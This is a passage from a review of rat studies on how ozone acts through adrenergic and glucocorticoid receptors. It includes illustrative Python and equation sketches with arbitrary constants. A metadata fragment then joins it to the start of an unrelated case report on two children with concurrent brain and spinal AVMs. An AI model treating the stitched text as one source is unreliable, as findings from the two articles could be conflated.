We have shown that eliminating the circulating ligands (catecholamines and glucocorticoids) for ARs and GRs via total bilateral adrenalectomy nearly eliminated ozone-induced lung vascular leakage, injury, and inflammation, providing first-hand evidence of the contribution of circulating epinephrine and corticosterone, and their receptor targets, in mediating ozone's acute effects in rats [113]. More importantly, when only the adrenal medulla was removed while keeping the cortex in place (bilateral adrenal demedullation), which diminished circulating epinephrine while only marginally affecting levels of corticosterone, there was also a reduction of ozone-induced lung injury and inflammation, suggesting that circulating epinephrine, which binds to ARs, was critical in mediating pulmonary effects [113]. These findings were further supported by the observation that global transcriptional changes induced by ozone in the lungs of normal rats (over 2000 genes changed) were reduced by over fivefold in animals with adrenal demedullation or total adrenalectomy [114]. It is noteworthy that ozone-induced lung injury and inflammation are observed over the first 2 days of ozone exposure; these effects are reversible despite repeated daily exposure for 3 or more consecutive days, suggesting adaptation.
Adrenalectomy, in addition to eliminating epinephrine and corticosterone from circulation, also depletes mineralocorticoids, which are important in the osmotic balance of salt and water and in vascular function, thus removing the influence of endogenous ligands for ARs and GRs, as well as for mineralocorticoid receptors. To assess the precise contributions of epinephrine and corticosterone, we performed a gain-of-function experiment by treating adrenalectomized rats with β 2 AR plus GR agonists, and assessed ozone-induced lung injury, systemic and pulmonary inflammation, and cytokine gene expression [4]. In this study, a β 2 AR agonist was selected based on the enriched distribution of β 2 ARs in the lungs and their functional significance [1]. The reduction of ozone-induced pulmonary and systemic effects by adrenalectomy, and the restoration or even exacerbation of these effects in adrenalectomized rats treated with a combination of β 2 AR and GR agonists, suggest that ozone's effects on the lungs are mediated by the activation of these receptors, and not by effects on circulating mineralocorticoids.
βAR and GR Activation Contribute to Ozone-Induced Lung Inflammation
We have also assessed the independent roles of βARs and GRs in ozone-induced inflammation by inhibiting GRs while pharmacologically activating βARs, or by inhibiting βARs while pharmacologically activating GRs, prior to exposing rats to ozone [15]. These experiments demonstrated that the effects of βARs and GRs are manifested independently after ozone exposure in animals. The involvement of ARs and GRs in ozone-induced lung injury and inflammation suggests a potential interaction with the therapeutics used for asthma and COPD, which work through the same receptor system. As ozone increases circulating epinephrine and corticosterone [14,105], it can be presumed that patients taking combination treatment with β 2 AR and GR agonists will have exacerbated inflammatory and pulmonary functional outcomes upon air pollution exposure. Children with asthma using maintenance medication have greater pulmonary inflammatory responses to ozone than those not receiving medication [116], further supporting the contribution of AR and GR activation to adverse pulmonary and systemic health outcomes.
Glucocorticoids exert their anti-inflammatory effects by reducing the transcription of proinflammatory cytokines and influencing the egress and margination of granulocytes and lymphocytes from lymphoid organs [25]. The findings that ozone-induced depletion of circulating T and B lymphocytes was reversed by adrenalectomy in rats, and that ozone's effect was restored by pretreating adrenalectomized rats with dexamethasone (a GR agonist) plus clenbuterol (a β 2 AR agonist), support the role of βARs and GRs in mediating systemic immune effects and pulmonary inflammation [4]. Our recent study examined the kinetics of stress hormone release together with changes in the pool of various immune cells in the circulation, as well as changes in circulating cytokines, during a 4-h ozone exposure [85].
This study clearly demonstrated that the depletion of circulating granulocytes, monocytes, T helper cells, cytotoxic T cells, and B cells occurred after increases in circulating epinephrine and corticosterone within 1 h of ozone exposure. The increases in circulating stress hormones, and subsequent increases in the expression of glucocorticoid-responsive genes in the lungs, along with the depletion of circulating immune cells, were noted with only minimal changes in the circulating cytokines. Therefore, these data suggest that the stress-hormone-mediated activation of ARs and GRs likely leads to the pulmonary and systemic effects of ozone [85]. Ozone-induced upregulation of Tsc22d3, metallothionein 1 (Mt-1), and Fkbp5 in the lungs following increases in stress hormone levels suggests the activation of GR-responsive genes by increased corticosterone [4,6,14,85,117].
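The temporal ordering reported in [85] (a hormone rise first, then induction of GR-responsive genes, then depletion of circulating cells) is the signature of a simple first-order cascade, in which each downstream variable lags and smooths the one above it. The sketch below, with arbitrary rate constants and a square hormone pulse standing in for the 4-h exposure, is meant only to show that lag structure, not to fit the data.

```python
# First-order cascade toy: hormone pulse -> GR-responsive gene induction ->
# depletion of circulating lymphocytes. All rate constants are arbitrary.
import numpy as np

dt, t_end = 0.01, 8.0                               # hours
t = np.arange(0.0, t_end, dt)
hormone = (t < 4.0).astype(float)                   # elevated during a 4-h exposure
gene = np.zeros_like(t)                             # GR-responsive gene expression (a.u.)
depletion = np.zeros_like(t)                        # fraction of cells leaving circulation
k_ind, k_dec = 1.5, 0.4                             # gene induction / decay (1/h)
k_dep, k_ret = 0.8, 0.2                             # cell margination / return (1/h)
for i in range(1, t.size):
    gene[i] = gene[i - 1] + dt * (k_ind * hormone[i - 1] - k_dec * gene[i - 1])
    depletion[i] = depletion[i - 1] + dt * (k_dep * gene[i - 1] * (1.0 - depletion[i - 1])
                                            - k_ret * depletion[i - 1])
print(f"gene expression peaks at t = {t[gene.argmax()]:.1f} h; "
      f"cell depletion peaks at t = {t[depletion.argmax()]:.1f} h")
```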
To further assess the therapeutic relevance for those using dual therapy with agonists of β 2 AR and GRs, and how this may modulate ozone-induced lung injury and inflammation, we treated rats with β 2 AR and GR agonists, individually or in combination, at therapeutically relevant dose levels prior to ozone exposure. In this study, we demonstrated that ozone-induced lung injury and inflammation are highly exacerbated by treatment with the β 2 AR agonist clenbuterol, especially when given individually [6]. This exacerbation of ozone effects was dampened when combination therapy with clenbuterol plus dexamethasone was instituted. Likewise, a rhinovirus-induced increase in IL-6 was exacerbated by salmeterol, but this effect was dampened by coadministration of inhaled corticosteroids [118]. Since we used healthy animals in our studies, the implications of these findings need to be assessed carefully in asthmatic animal models. Nevertheless, because β 2 AR and GR agonists are used extensively in the treatment of asthma and COPD, the health implications of air pollution affecting the activity of these receptors, especially for individuals receiving these agonists, could be significant.
AR and GR Antagonists Inhibit Ozone-Induced Lung Inflammation
βARs are prominently distributed in the lungs, and therefore we further assessed their role in ozone-induced lung injury and inflammation [14,113]. We used propranolol, a nonspecific βAR antagonist, with or without the glucocorticoid antagonist mifepristone, to examine the contributions of the individual receptor types in mediating lung vascular leakage and inflammation after ozone exposure. Our studies in rats show that inhibiting βARs using propranolol is associated with the inhibition of ozone-induced inflammation [5]. These data suggest that the ozone-induced increase in epinephrine, which binds to β 2 AR, is associated with pulmonary inflammation; however, the precise mechanisms of cell- and organ-specific differences in βAR downstream signaling will need to be further assessed with air pollutant exposure [119]. The contribution of βAR signaling, and the differential involvement of β-arrestin activation, may underlie pollutant-specific differences in downstream signaling and inflammation.
GR manipulation during ozone exposure also provided insights into their role in pulmonary injury and inflammation. Ozone-induced increases in circulating corticosterone and subsequent lymphopenia, along with time-related depletion of granulocytes and M1 monocytes, suggest redistribution of circulating immune cells, likely marginating to the pulmonary vasculature, involving the activation of ARs and GRs [85]. Pretreatment of rats with the GR antagonist mifepristone, although reducing pulmonary protein leakage, was ineffective in reducing ozone-induced neutrophilic inflammation, suggesting that GR activation within the lungs was not involved in neutrophilic inflammation [5]. Interestingly, treatment with mifepristone reversed lymphopenia induced by ozone, implying that GR activation was necessary for systemic lymphopenia, and that glucocorticoids released after ozone exposure modulated the systemic immune response [5]. The combination of propranolol and mifepristone nearly eliminated ozone-induced lung vascular leakage, inflammatory cytokine induction, activation of glucocorticoid responsive genes, and the systemic immune response (lymphopenia), implicating βARs and GRs in ozone-induced inflammatory effects.
The Role of βARs in Ozone-Induced Lung Protein Leakage
It has been shown that the increase in vascular permeability induced by intravenous substance P injection in rats was blocked by the β 2 AR-specific agonist formoterol through its effect on reducing endothelial gap junctions [120]; this is contrary to what we observed with the β 2 AR-specific agonist clenbuterol, which was associated with increased protein leakage in air-exposed rats [6]. Moreover, the protein leakage induced by ozone exposure was highly exacerbated by clenbuterol pretreatment [4,6]. Because β 2 AR has high affinity for epinephrine relative to norepinephrine (Table 1), and because ozone specifically increased epinephrine levels in rats [14,105], it is likely that pulmonary β 2 AR might be involved in pulmonary vascular leakage; however, the contribution of cardiac β 1 AR and other associated hemodynamic changes cannot be ignored in mediating protein leakage.
Rats pretreated with propranolol alone demonstrated significantly reduced vascular leakage and lung inflammation after ozone exposure [5]. Increased circulating epinephrine can have marked effects on cardiac β 1 AR, pulmonary α 1 AR, and β 2 AR. Propranolol is a nonspecific βAR blocker, which can inhibit the activity of both β 1 AR and β 2 AR. Because of marked effects of epinephrine on β 1 AR in cardiac muscle contractility, and on β 2 AR in vascular and bronchial smooth muscle relaxation, an ozone-induced epinephrine increase may lead to hemodynamic changes in the low-pressure pulmonary vasculature. Moreover, due to parasympathetic dominance over sympathetic activation on the heart [121], even though an ozone-induced increase in epinephrine was apparent [14,105], cardiac depression in rats acutely exposed to ozone was associated with bradycardia [121]. This imbalance of sympathetic and parasympathetic influence might specifically exacerbate hemodynamic changes in the low-pressure pulmonary vasculature, leading to vascular protein leakage in the alveoli. Hypoxia-induced pulmonary injury in rats has been shown to involve catecholamines, such as epinephrine, and their action on αARs and βARs [122]. Both αARs and βARs have been implicated in pulmonary edema [123,124]. Based on the reversal of ozone-induced pulmonary edema by propranolol [5], it is likely that these receptors may also play an important role in the modulation of hemodynamic changes after air pollution exposure.
Circulating Ligands of ARs and GRs in Lung-Brain Communication
In order to better understand the contribution of the lung–brain axis, through the activation of ARs and GRs, to mediating ozone-induced pulmonary and systemic effects via increases in circulating epinephrine and corticosterone, we further examined circulating pituitary-derived hormones and gene expression changes in stress-responsive regions of the brain, such as the hypothalamus and the brainstem, in rats with sham surgery and those with total bilateral adrenalectomy [7]. It has been previously shown that acute ozone exposure activates stress-responsive regions, such as the nucleus tractus solitarius, within the brainstem and the hypothalamus, where stress signals are processed [125]. In our study, a single ozone exposure was associated with marked gene expression changes in the brainstem and the hypothalamus, which reflected changes induced by hypoxia, inflammatory signaling, and steroidal as well as mTORC signaling, suggesting cellular homeostatic physiological alterations through adrenergic and steroidal signaling in both brain regions [7]. This was further supported by nearly 70% similarity in the genes upregulated by ozone in these two brain regions. One of the important findings from this study was that no gene expression changes were noted in air-exposed adrenalectomized rats, which had severely depleted epinephrine and corticosterone, relative to sham rats [7], suggesting that stress signals conveyed through circulating AR and GR ligands were needed to induce changes in the rats' brains. Moreover, virtually no gene expression changes occurred in ozone-exposed adrenalectomized rats, implying that in the absence of circulating epinephrine and corticosterone no cellular responses were produced in either brain region, and that pulmonary AR and GR activation is necessary for ozone-induced gene expression changes to occur in the brain. Although adrenalectomy also markedly reduced lung gene expression [114], one could presume that the activation of ARs and GRs in the lung is critical for changes in the lungs and brain to occur after ozone exposure. Furthermore, communication between the lungs and the brain was needed for the brain to receive the irritancy stress signal after ozone exposure. It is noteworthy that ARs and GRs have been implicated in stress adaptation and resiliency, and that failure of the normal functioning of these receptors has been linked not only to neurological ailments but also to peripheral chronic diseases [16,17,19]. Thus, the contribution of these receptors to air-pollutant-induced stress responses and subsequent pulmonary, neuronal, and peripheral effects, as well as adaptation, warrants further consideration.
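Overlap statements such as the ~70% similarity between the brainstem and hypothalamus gene sets reduce to simple set arithmetic on differentially expressed gene lists. The snippet below shows two common ways of expressing such overlap (relative to the smaller list, and as a Jaccard index); the gene names are placeholders, not data from [7].

```python
# Quantifying overlap between two differentially expressed gene lists.
# Gene names are placeholders, not actual results from the cited study.
brainstem = {"Fkbp5", "Tsc22d3", "Mt1", "Sgk1", "Il6", "Klf15", "Per1"}
hypothalamus = {"Fkbp5", "Tsc22d3", "Mt1", "Sgk1", "Klf15", "Zbtb16"}

shared = brainstem & hypothalamus
overlap_vs_smaller = len(shared) / min(len(brainstem), len(hypothalamus))
jaccard = len(shared) / len(brainstem | hypothalamus)
print(f"shared = {len(shared)}, overlap = {overlap_vs_smaller:.0%}, Jaccard = {jaccard:.2f}")
```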
Potential Interactive Roles of ARs and GRs in Inflammatory Mechanisms
Although research has shown that ARs and GRs influence inflammatory responses in the body and regulate physiological homeostatic processes, few studies have elucidated whether these receptors interact during the activation of molecular signaling pathways at the level of second messengers [126][127][128]. Given the diversity and interconnectivity of AR/GPCR-mediated signaling, spanning various second messengers, and GR-mediated transcriptional activity, along with cooperativity with other transcription factors influencing the expression of about 10-20% of the human genome (as reviewed in [25]), it is conceivable that there are interactive influences on the physiological effects of AR and GR activation. The primary evidence for an interactive influence comes from the therapeutic efficacy of combination therapy involving β 2 AR agonists as bronchodilators and GR agonists as immunosuppressants. To understand the mechanisms of the collective influence of a combination therapy involving bronchodilators and steroids, Mostafa et al. [126] examined global transcriptome changes induced by individual and combination treatments in airway epithelial cells. This study demonstrated that the glucocorticoid agonist budesonide suppressed proinflammatory gene transcription, while enhancing the transcription of genes involved in apoptosis, proliferation, differentiation, and other functional processes, in cells treated with the β 2 AR-specific agonist formoterol, suggesting that interactive effects at multiple levels may influence the effectiveness of the therapy. These authors have further reported that long-acting βAR agonists do not necessarily enhance the expression of all glucocorticoid-inducible genes, but have gene-specific effects [127].
The interactive influence of glucocorticoids and catecholamines has also been reported at the level of the neuroendocrine system. Glucocorticoid modulation of pituitary adrenocorticotropic hormone (ACTH) release can alter thymus catecholamine availability through its influence on sympathetic nerve terminals, and change AR gene expression [128]. It has been suggested that dexamethasone-induced GR activation interferes with the trafficking and degradation of the β-arrestin-α 2c AR complex in human neuroblastoma cells [129]. Long-term use of bronchodilators has been reported to cause β 2 AR desensitization in airway smooth muscle cells and a reduction in therapeutic efficacy. It has been shown that GPCR-kinase-mediated phosphorylation of ligand-bound receptors leads to β-arrestin binding, which prohibits further receptor G αs coupling and cellular signaling [130]. GR activation normally reduces β-arrestin 2 levels in lung epithelial cells, which is hypothesized to counteract β-arrestin-2-induced desensitization and, thus, increase the therapeutic efficacy of bronchodilators [92]. This reduction would enable β 2 AR agonists to activate signaling to cause airway smooth muscle relaxation and improve lung function. The activation of β 2 AR has been shown to enhance GR-mediated transactivation through G βγ subunits and PI3 kinase [131]. Stimulation of β 2 AR increased cAMP, and led to cross-talk between CREB proteins and GRs [132]. These interactive effects may involve common second messengers, leading to changes in downstream signaling events. Thus, interactions between AR signaling and GR-mediated transcriptional changes are likely involved in the therapeutic efficacy of combination treatment using β 2 AR and GR agonists for asthma and COPD. Because ozone exposure was shown to increase both epinephrine and corticosterone, interactive effects through endogenous AR and GR ligands are also likely. Combination treatment with the β 2 AR agonist clenbuterol and the GR agonist dexamethasone in rats, at therapeutically relevant dose levels, dampened ozone-induced inflammatory responses when compared with the responses induced by clenbuterol alone [6]. Future studies on air pollutants should examine the interactive influence of activating AR subtypes and GRs.
Air Pollution's Impact on Circadian Clock Genes and the Potential Mediating Roles of ARs and GRs
Neuroendocrine pathways that mediate ozone effects are also known to regulate the expression of circadian clock genes and associated physiological changes (reviewed in [133,134]), raising the possibility that circadian mechanisms, together with AR and GR signaling, might also be involved in air pollution health effects. Exposure to air pollution has been associated with disturbed sleep cycles and obstructive sleep apnea [135]. Cantone et al. [136] recently reported that, in acute ischemic stroke patients, PM exposure was linked to changes in the methylation of CLOCK-regulated genes. PM exposure in utero has also been shown to disrupt placental epigenetic signatures of CLOCK genes in women, which may be linked to inflammatory changes [137]. Experimental evidence has begun to emerge linking exposure to air pollutants to changes in the expression of circadian genes, and to downstream signaling events that alter inflammation and metabolic processes. In mice, exposure to air pollutants has been reported to induce changes in chromatin dynamics by downregulating histone acetylases, causing increased promoter occupancy, altering the expression of genes involved in neuroendocrine-mediated circadian rhythmicity, and producing subsequent changes in genes regulating brown adipose tissue as well as liver metabolic processes [138]. These processes have been shown to be regulated at the cellular level through ARs and GRs [139], implying that oscillatory changes in the levels of circulating adrenal-derived hormones are linked to changes in neuronally induced diurnal rhythmicity.
Since the SAM and HPA axes coregulate circadian and stress-induced peripheral immune and metabolic homeostasis, it is conceivable that health effects induced by air pollutants through this pathway could impair circadian rhythmicity and associated peripheral changes (Figure 4). Diurnal and stress-induced variations occur not only in metabolic processes but also in immune surveillance, to ensure protection during the active period [139,140]. The hypothalamus, the master regulator of environmental cues, receives stress signals from external and internal stressors through afferent autonomic sensory nerves, and light signals from the suprachiasmatic nucleus (SCN), which is connected to the retina [141]. The hypothalamus integrates the information received from both sources to generate bodily responses through neural and endocrine mechanisms involving the SAM, HPA, and other hormonal axes, directing peripheral immune and metabolic responses via the activation of ARs and GRs [17]. Diurnal oscillations have evolved through complex self-regulatory mechanisms of genes and transcription factors in the brain and peripheral organs, and work in tandem with adrenergic and glucocorticoid mechanisms to synchronize physiological changes with activity patterns. The oscillatory pattern programmed by the hypothalamus in response to diurnal changes is communicated to the periphery through sympathetic nerves and the SAM and HPA axes [133,134]. This results in oscillatory changes in the production of norepinephrine at nerve terminals, as well as catecholamines and glucocorticoids within the adrenals and blood, which then mediate pulsatile downstream changes in immune cell maturation, egress, and inflammation through ARs and GRs (Figure 4).

Figure 4. Proposed schematic of how adrenergic and glucocorticoid mechanisms integrate circadian changes and environmental stress signals to direct immune responses with oscillatory patterns. The suprachiasmatic nucleus (SCN), receiving photonic signals from the retina via the retinohypothalamic tract, transmits these to the paraventricular nucleus (PVN) of the hypothalamus, which also integrates other stress signals from afferent autonomic sensory nerves, including those induced by air-pollution-induced stress encountered in the lungs. These signals are integrated in the hypothalamus and relayed to the periphery through: (1) sympathetic nerves, which transmit signals to peripheral organs by releasing norepinephrine (NE); (2) sympathetic nerves innervating the adrenal medulla and regulating the production and release of epinephrine (EPI) and norepinephrine into circulation; and (3) the hypothalamic-pituitary-adrenal (HPA) axis, mediating the pituitary release of adrenocorticotropic hormone (ACTH) and stimulating glucocorticoid (GC) production by the adrenal cortex. Adrenal glucocorticoids locally regulate the release of medullary hormones. Catecholamines and glucocorticoids released into circulation induce pulsatile cellular physiological changes, resulting from stress and circadian rhythms, through binding to their respective receptors, AR and GR subtypes. Within the central nervous system, the locus coeruleus (LC) produces norepinephrine, which is transmitted across many brain regions, including the SCN, and can regulate circadian changes centrally. Circulating catecholamines and glucocorticoids bind to ARs and GRs in diverse organs and cells, including immune cells, to regulate the expression of circadian locomotor output cycles kaput (CLOCK)- and brain and muscle aryl hydrocarbon receptor nuclear translocator-like 1 (BMAL1)-regulated genes. The signaling involves the activation of transcription factors, including the cyclic AMP response element-binding protein (CREB), to modulate the expression of CLOCK- and BMAL1-regulated genes. The CLOCK and BMAL1 transcription factors regulate the transcription of genes encoding circadian proteins, such as period circadian proteins (PERs) and cryptochromes (CRYs). The rhythmic activation of GRs upon binding to GCs, and their nuclear translocation, can modulate inflammatory gene expression in association with CLOCK and BMAL1 in immune cells, facilitating diurnal changes in the maturation and homing of immune cells and in inflammation.
Rhythmic variations in catecholamine and glucocorticoid release [142] are regulated by transcriptional regulatory loops involving circadian locomotor output cycles kaput (CLOCK) and brain and muscle aryl hydrocarbon receptor nuclear translocator-like 1 (BMAL1), which drive period circadian protein (PER) and cryptochrome (CRY) genes by binding to their promoters [143,144]. Brain-derived norepinephrine from the locus coeruleus is presumed to modulate SCN-mediated oscillatory changes [145,146], contributing to circadian changes in sympathetic and HPA-mediated regulation of immune surveillance in the periphery [139,140]. Likewise, GRs demonstrate oscillatory diurnal patterns [142] through binding to glucocorticoids, and exert cellular effects by regulating inflammatory gene expression. Thus, although no studies to date have linked air pollution exposure to changes in circadian regulatory mechanisms acting through ARs and GRs, it is conceivable that this receptor system is critical in mediating responses to environmental cues, including diurnal variation through the light cycle. Given the current evidence that AR and GR functionality is critical in ozone-induced pulmonary and systemic effects, and that exposure to air pollutants is linked to alterations in the sleep cycle and, through epigenetic processes, in genes involved in circadian rhythmicity, future air pollution studies should consider a comprehensive assessment of the neuroendocrine stress response system that includes circadian mechanisms.
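The transcription-translation feedback loop just described (CLOCK/BMAL1-driven transcription of Per/Cry, repressed by the accumulated nuclear PER/CRY protein) can be summarized with a minimal Goodwin-type oscillator. The equations below are a generic, textbook-style sketch with assumed variables and rate constants, not a model fitted in the cited studies.

```latex
\[
\begin{aligned}
\frac{dM}{dt}     &= \frac{v_{1}K^{n}}{K^{n}+P_{N}^{\,n}} - d_{1}M,
  && \text{\emph{Per/Cry} transcription driven by CLOCK/BMAL1, repressed by } P_{N},\\
\frac{dP_{C}}{dt} &= k_{2}M - d_{2}P_{C},
  && \text{translation to cytosolic PER/CRY},\\
\frac{dP_{N}}{dt} &= k_{3}P_{C} - d_{3}P_{N},
  && \text{nuclear entry of the repressor, closing the loop.}
\end{aligned}
\]
```

Sustained oscillation in this minimal form requires sufficiently steep repression (a large Hill coefficient n) or additional delays, consistent with the multistep loops described above.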
Research Gaps and Opportunities
We demonstrated that ozone, a prototypic oxidant air pollutant, induces its effects via the neuroendocrine-mediated release of epinephrine and corticosterone, which cause cellular effects by interacting with their receptors, ARs and GRs, respectively [5]. As an oxidant, inhaled ozone initially interacts with the airway surface lining and alveolar components [80]. Within minutes of an initial encounter with ozone, there is an increase in the sympathetically mediated release of epinephrine, followed by the HPA-mediated release of corticosterone (the endogenous ligands for ARs and GRs), prior to increases in cytokine mRNA in the lungs or inflammation [85]. The mechanism by which this initial communication between the lungs and the brain occurs is critical to understanding the role of these receptors in mediating the health effects of air pollution because, in the absence of these circulating receptor ligands, ozone produces neither lung injury/inflammation nor brain effects [5,7,113]. Although autonomic sensory innervation and lung-brain neural communication are well studied [147], it is not well understood how the initial irritation induced by air pollutants in the lungs is communicated to the brain to induce a neuroendocrine stress response involving ARs and GRs. It has been postulated that bioactive mediators released by lung cells are responsible for the extrapulmonary and even brain effects of air pollutants [148,149]; however, inflammation takes several hours to develop, whereas neuroendocrine effects are noted within an hour [85]. Although our studies show that activation of ARs and GRs is required, and that the SAM and HPA axes are stimulated within minutes of ozone exposure, resulting in increased circulating epinephrine and corticosterone, it remains important to understand how the initial event engages the neural axes, as well as the role of circulating stress hormones in mediating this event through ARs and GRs.
Due to the diversity of AR and GR subtypes, their involvement in multicellular responses and regulation, and their essential roles in physiological processes, it is difficult to identify one or more specific proteins or genes that reflect the activity of these receptors. Likewise, assessing one biological response at a time may provide an incomplete understanding of the integrated roles of ARs and GRs in mediating and regulating circadian oscillatory changes and stress. Therefore, to clearly delineate the contribution of these receptors, a comprehensive assessment of AR- and GR-regulated processes involving the neuroendocrine system is needed. Experimentally, it is possible to determine the genomic effects of GR activation through transcriptional changes in downstream gene targets; however, the interactive influence of other transcription factors and the downstream effects of GRs are difficult to assess in isolation. Moreover, AR/GPCR signaling is complex, involving multiple G proteins and second messengers that must be accounted for when investigating specific mechanisms. Thus, novel, multipronged approaches, together with consideration of temporality, are needed to identify the precise contributions of ARs and GRs, and their coregulation, to air pollutant-induced changes. The availability of a wide variety of specific receptor agonists and antagonists for both AR and GR subtypes offers the opportunity to assess the roles of each receptor subtype in the cellular effects induced by air pollutants.
Since ARs and GRs are involved in neuroendocrine stress and circadian responses that have peripheral tissue effects, assessing their contributions provides insights into how air pollutants may affect multiple organ systems, and how failure of the multifaceted neuroendocrine system to function normally can contribute to chronic diseases. Because ARs and GRs have been implicated in the regulation of stress and stress adaptation in the brain [16,17,19,150], it is likely that any malfunction of these receptors due to underlying chronic psychosocial stresses or other conditions, such as altered exposure to the light-dark cycle, will modify how air pollution's effects are mediated. Evaluating these receptors in the interactive cellular effects of environmental and psychosocial stressors, as well as circadian rhythmicity, will be critical to understanding individual variability in the health effects of air pollution. Incorporating the roles of ARs and GRs will also have important implications for individuals receiving steroidal and bronchodilator treatments, since they may have exacerbated responses to air pollutants. Thus, future air pollution studies will benefit from assessing the roles of various neuroendocrine hormones, and how their influence on ARs and GRs mediates cellular effects and downstream molecular events in response to stress and diurnal changes.
"year": 2021,
"sha1": "b2672ef9b083ce5d43fb6e450f579979b4bc5d8e",
"oa_license": "CCBY",
"oa_url": "https://www.mdpi.com/2305-6304/9/6/132/pdf",
"oa_status": "GREEN",
"pdf_src": "PubMedCentral",
"pdf_hash": "b2672ef9b083ce5d43fb6e450f579979b4bc5d8e",
"s2fieldsofstudy": [
"Environmental Science",
"Medicine"
],
"extfieldsofstudy": [
"Medicine"
]
} |
Concurrent intracranial and spinal arteriovenous malformations: Report of two pediatric cases and literature review
Background: Concurrent intracranial and spinal arteriovenous malformations (AVMs) are very rare, with only a few cases reported in the literature. Two such rare cases of concurrent intracranial and spinal AVMs are presented. Case Description: Case 1 is a 12-year-old girl with headache and motor disturbances in the lower limbs. Spinal and brain angiography revealed a spinal AVM at level T8-T9 and an intracranial AVM in the left mesial temporal lobe. Her spinal AVM was embolized, while no treatment was given for her intracranial AVM. Case 2 is a 10-year-old girl who presented with headache and quadriparesis. Her brain and spinal angiograms revealed an intracranial AVM in the left parietal lobe and a spinal AVM at level C2, respectively. Craniotomy and excision were performed for her intracranial AVM, and embolization for the spinal AVM. Conclusion: It is proposed that multiple AVMs may result from a yet-unrevealed pathogenesis or a strong embryogenetic anomaly, which may be different from that involved in single AVMs. With a lack of consensus over the best therapeutic strategy, multimodality treatment based on the individual's needs is suggested.
INTRODUCTION
A single intracranial arteriovenous malformation (AVM) together with a spinal AVM is very rare, with fewer than 10 cases reported in the literature since 1969. Multiple intracranial AVMs with a spinal AVM are even more infrequent; only three other cases have been reported in the literature, one being an autopsy case. We report two such uncommon cases involving an intracranial AVM along with a spinal AVM.
Case 1
The first case of intracranial AVM along with a spinal AVM involves a 12-year-old girl who presented to us with a 3-month history of headache and progressively worsening spastic paraparesis with reflex spasms of both lower limbs. There was no history of lower back pain and no bladder or bowel disturbances. Examination showed power of 3/5 in the right lower limb and 4/5 in the left lower limb, with normal bulk but increased muscle tone. She also had brisk reflexes in both lower limbs. Cognitive functions, speech, and upper limb reflexes were normal, along with intact sensations and cerebellar functions. She had been in a good state of health in the past, and her family history was negative for any hereditary vascular disorders or AVMs. Magnetic Resonance Imaging (MRI) of the dorsolumbar spine showed epidural flow voids. A spinal angiogram showed an AVM in the mid-dorsal region at level T8-T9 with three feeders comprising the left 8th and the right 9th and 10th intercostal arteries [Figure 1a]. Brain imaging studies were done to investigate any intracranial pathology responsible for her persistent headache. Her brain MRI and Magnetic Resonance Angiography (MRA) revealed a small AVM in the left hippocampus supplied by the left posterior cerebral artery and with deep venous drainage [Figure 1b and c]. There was no hemorrhage from the lesions, and ischemia due to the spinal AVM seemed to be the probable cause of her paraparesis.
Spinal AVM embolization was carried out with polyvinyl alcohol (PVA) and histoacryl particles under general anesthesia, and complete embolization was achieved [Figure 1d]. No treatment was offered for her cerebral AVM, and her headache was managed conservatively with analgesics. The hospital course was smooth, and she was discharged after a total of 5 days of hospital stay.
On follow-up after 1 year, the patient was doing well with no significant symptoms. She was able to walk independently and did not require further treatment.
Case 2
The second case, a single intracranial AVM with a concurrent spinal AV fistula, involves a 10-year-old girl who presented to us with headaches and progressively increasing weakness of all four limbs for 2½ years. On examination, she had decreased muscle bulk and increased tone in both upper and lower limbs. She also had brisk reflexes, upgoing plantars, and clonus. She was quadriparetic, with power of 3/5 in the right upper and lower limbs and 4/5 in the left half of the body. She was otherwise conscious and well oriented to time, place, and person, and her sensations were intact. Her past history was unremarkable, and there was no significant family history of any hereditary vascular disorder or AVMs. Her brain MRI and cerebral angiography revealed a medium-sized left parasagittal AVM in the parietal region with superficial venous drainage [Figure 2a and b]. Craniotomy and excision were performed at another institute. Postoperatively, she was doing well, with no residual AVM on cerebral angiography [Figure 2c].
After her cranial surgery, her symptoms recurred, with progressive weakness and signs of myelopathy in all four limbs. Angiography was repeated and revealed an AV fistula in the cervical region [Figure 2d]. Multiple feeders were observed, including the bilateral vertebral arteries, the bilateral posterior inferior cerebellar arteries (PICAs), and the left costocervical artery from the subclavian artery. Some tortuosity was observed in the previously treated AVM in the left parietal region, but no arteriovenous (AV) shunting was seen. A few tortuous abnormal vascular channels were seen in the venous phase. MRI also showed a cervical aneurysm [Figure 2e and f]. There was no hemorrhage from the lesion, and her symptoms were probably due to ischemia secondary to the steal phenomenon.
Angiographic coiling of the aneurysm was done, and the feeders from the vertebral arteries and PICAs were embolized. A tiny feeder from the left costocervical artery was embolized with histoacryl glue. No residual AV fistula was seen on post-procedural angiography [Figure 2g and h], and no postoperative complications occurred; the patient was stable and was discharged.
On follow-up, the patient was doing well, and the treatment of the AV fistula appeared adequate. However, after 1 year and 4 months, the patient showed signs of mild weakness in the left upper and lower limbs. She was able to carry out most tasks independently; however, she limped while walking and had weakness of the left hand and fingers. The patient refused further evaluation and management.
DISCUSSION
Multiple AVMs have been associated with hereditary disorders such as Rendu-Osler-Weber syndrome (also known as hereditary hemorrhagic telangiectasia). It is extremely uncommon to see concurrent intracranial and spinal AVMs not associated with such syndromes.
A single intracranial AVM along with a spinal AVM is very rare, with the total number of cases reported in the literature being less than 10 since 1969. [8,9,15,20,22] Multiple intracranial AVMs with a spinal AVM are even more infrequent; only three other cases have been reported in the literature, one being an autopsy case. [7,13,14] The earliest cases comprise those reported by Di Chiro et al. in 1972 [1] and 1973; [3] however, exact details of those cases were not available. Krayenbuhl et al. also reported such a case, involving AVMs in the cerebellum and spinal cord, earlier in 1969. [11] The details of all the reported intracranial AVMs coexisting with spinal AVMs are listed in Table 1, along with our cases. The sizes of the intracranial AVMs were graded as small (<3 cm), medium (3-6 cm), or large (>6 cm), and their venous drainage as superficial or deep, in accordance with Spetzler and Martin's grading system. [18] The spinal AVMs were grouped into single coiled vessel, glomus, and juvenile types, as classified by Di Chiro et al. [2,4] The age at presentation ranged from 1.3 to 55 years, with a mean age of 23.8 years. There were five males and six females. Six cases presented with subarachnoid hemorrhage (SAH), intraventricular hemorrhage (IVH), or intracerebral hemorrhage (ICH) as a result of hemorrhage from an AVM. Of the 19 intracranial AVMs whose size was known, 16 were small and 3 were medium. Moreover, of the 17 lesions with known venous drainage, 15 intracranial AVMs had superficial and only 2 had deep venous drainage. The level of spinal AVM ranged from C1 to L2. There were four glomus, two dural, and one juvenile spinal AVMs.
